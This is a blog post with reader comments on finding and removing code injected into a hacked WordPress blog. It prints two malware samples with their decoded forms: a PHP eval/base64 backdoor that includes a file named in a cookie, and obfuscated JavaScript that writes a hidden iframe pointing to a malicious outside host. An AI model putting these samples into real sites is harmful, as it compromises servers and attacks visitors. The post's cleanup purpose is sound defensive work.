Be my fan on FacebookWhat to do when your blog has a virus
- May 1, 2009 by Emanuele Feronato
- Filed under WordPress | 11 Comments
The last time my blog was hacked was… let me remember… uh… yesterday.
But hackers know my blog since quite a long ago and they even made my blog be marked by Google as a site that may harm your computer.
Never mind, all these attacks gave me some experience about the typical WordPress hack.
So, when you realize your blog has been hacked, follow these steps:
Backup your ftp content
Simply open your favorite FTP client and download all the content of your site
Backup your MySQL database
Every decent hosting plan now supports PhpMyAdmin. With this tool you can export and save your entire database in a matter of seconds (or minutes, according to the size of your DB).
Look at this picture:
with your WP database selected, click on Export (1)
Then this is the next page:
remember to:
1) Have all tables selected
2) Select SQL as database type
3) Check Structure, Add IF NOT EXISTS and Enclose table and field names with backquotes. Leave unchecked Add AUTO_INCREMENT value because WP tables already have an auto increment column
4) Check Data, Complete inserts, Extended inserts and Use hexadecimal for BLOB
5) Check Save as file and None. Choosing zipped can be too CPU intensive for your hosting plan
Hunt for the virus
I experienced two types of viruses, both with inserted code into my WP files.
The first one is Php code inserted in one page, like this one
eval(base64_decode('aWYoaXNzZXQoJF9DT09LSUVbInNoIl0pKXtpbmNsdWRlKCRfQ09PS0lFWyJzaCJdKTtleGl0O30='));
that once evaluated is
if(isset($_COOKIE["sh"])){include($_COOKIE["sh"]);exit;}
The second one is a javascript code inserted in one page, like this one
var OymMAWPnBMGWAGuoPiVY = "q60q105q102q114q97q109q101q32q119q105q100q116q104q61q34q52q56q48q34q32q104q101q105q103q104q116q61q34q54q48q34q32q115q114q99q61q34q104q116q116q112q58q47q47q105q108q111q118q101q104q97q115q104q46q99q110q47q114q97q115q116q97q116q100q115q47q103q111q46q112q104q112q63q115q105q100q61q53q34q32q115q116q121q108q101q61q34q98q111q114q100q101q114q58q48q112q120q59q32q112q111q115q105q116q105q111q110q58q114q101q108q97q116q105q118q101q59q32q116q111q112q58q48q112q120q59q32q108q101q102q116q58q45q53q48q48q112q120q59q32q111q112q97q99q105q116q121q58q48q59q32q102q105q108q116q101q114q58q112q114q111q103q105q100q58q68q88q73q109q97q103q101q84q114q97q110q115q102q111q114q109q46q77q105q99q114q111q115q111q102q116q46q65q108q112q104q97q40q111q112q97q99q105q116q121q61q48q41q59q32q45q109q111q122q45q111q112q97q99q105q116q121q58q48q34q62q60q47q105q102q114q97q109q101q62";var LtBVGDCUsUSHTFUTcjHd = OymMAWPnBMGWAGuoPiVY.split("q");var wOAwUuljcGInzJIGNLaG = "";for (var gtNzyhTaRbENpEKKzvub=1; gtNzyhTaRbENpEKKzvub<LtBVGDCUsUSHTFUTcjHd.length; gtNzyhTaRbENpEKKzvub++){wOAwUuljcGInzJIGNLaG+=String.fromCharCode(LtBVGDCUsUSHTFUTcjHd[gtNzyhTaRbENpEKKzvub]);}document.write(wOAwUuljcGInzJIGNLaG)
that once evaluated returns
<iframe width="480" height="60" src="http://ilovehash.cn/rastatds/go.php?sid=5" style="border:0px; position:relative; top:0px; left:-500px; opacity:0; filter:progid:DXImageTransform.Microsoft.Alpha(opacity=0); -moz-opacity:0"></iframe>
I got some more similar codes injected in my pages, but all of them have been inserted at the end of the page, in the last row.
So you should search for eval or document.write and see if there are strange strings like the ones I got.
Then, delete or comment them and you should have your blog cleaned and virus-free
I am thinking about making a plugin doing all this hard work for you, at the moment the only one existing seems to be WordPress Exploit Scanner but I would like something more complete.
(1 votes, average: 5.00 out of 5)
Loading ...You will be pleasantly surprised by WordPress Themes provided by Template Monster. All of them are of professional design and high quality.
11 Responses
Leave a Reply
TUTORIAL SERIES:
- Una guida completa al gioco del poker online e una selezione dei migliori casino online.
- casino online
- migliori casino online
- BlackJack online
- casinò online
Or just use Blogger.com … ? Personally, I hate WordPress and stopped hosting my own blog ages ago because of how much of a PITA it became.
That’s the downside of using a well known application like WordPress, but WordPress is just awesome.
But how do they insert the code in the php file? I mean, to edit the php file they must have access to the OS (or ftp), or they don’t?
Wow Let me know the virus only attack wordpress? thanks alot tool for cure the virus
Damn hacker!
I’ve ran dozens of wordpress sites and never had an issue. But then I pay attention to securing them in the first place.
- Don’t use shared hosting, and if you must, pay very close attention to write permissions on files and directories.
- Don’t use wp- prefix on directories or database
- htaccess the admin directory with a password or ip restriction
- Install as few plugins as possible and never install obscure ones.
- Keep everything updated
- Remove meta generator worpdress version from header and themes
Wow, thanks for the tips, Mike D! :)
There is a difference between a “hacker” and “cracker”. A hacker is nice person who find these “bugs” and “loopholes” top stop the evil “crackers” from causing damage. Why do they do it? The n00b crackers (script kiddies) do it so they can be “cool” and look like a “pro”, sadly they find the software on the net and use it XD. Please don’t get the terms mixed up!
My website (http://www.lizardproductions.net/) recently got a threatening message from a supposed “hacker” on the main page… I’m only 13 years old and I don’t know much about Dreamweaver, apart from how to make templates and pages and upload them to the server… Has anybody got some tips on how I might be able to prevent my site from possibly being hacked?
@Brindy: Depends on your need, I can’t stand the blogger.com where you never have full control and if you just wan’t to change a little thing in layout is extremly painful. Wonder what clients would say if you told them “meh, get a blogger-blog instead!” ;)
@Emanuele and others: Great tips, never had a problem so far but I’m going to have an extra look through my blogs now :)
@Emanuele Feronato: Thanks for sharing… Useful tips.
@swineinflu: No. this malicious threads will not only affect WordPress Blogs. Its main entrance in PHP. If you are using PHP in your site, It will affect your PHP codes and it will insert malicious codes.
If your Host have good security software or Firewall in their server, no need to worry. Or otherwise You need to survive with these threads.
My website was recently hacked, and a malicious worm file distributed itself to all my folders which had perms of at least 755, and even some which did not (idk how, and idc.)
Emanuele, I found out the creator of the script. I will not post their username here however, just in case….
The script is quite nasty, it does basically everything I am afraid of to my files.
Fortunately, it seems whoever left the files on there forgot about em and never ran it.
I have a safe backup.
Can you help me determine the cause of my getting this and how to prevent it? The file is a php one, so I saw in the comments who made it. Would simply blacklisting the script name on the server itself prevent its execution?
PLEASE email me about this, you are the best person for me to ask.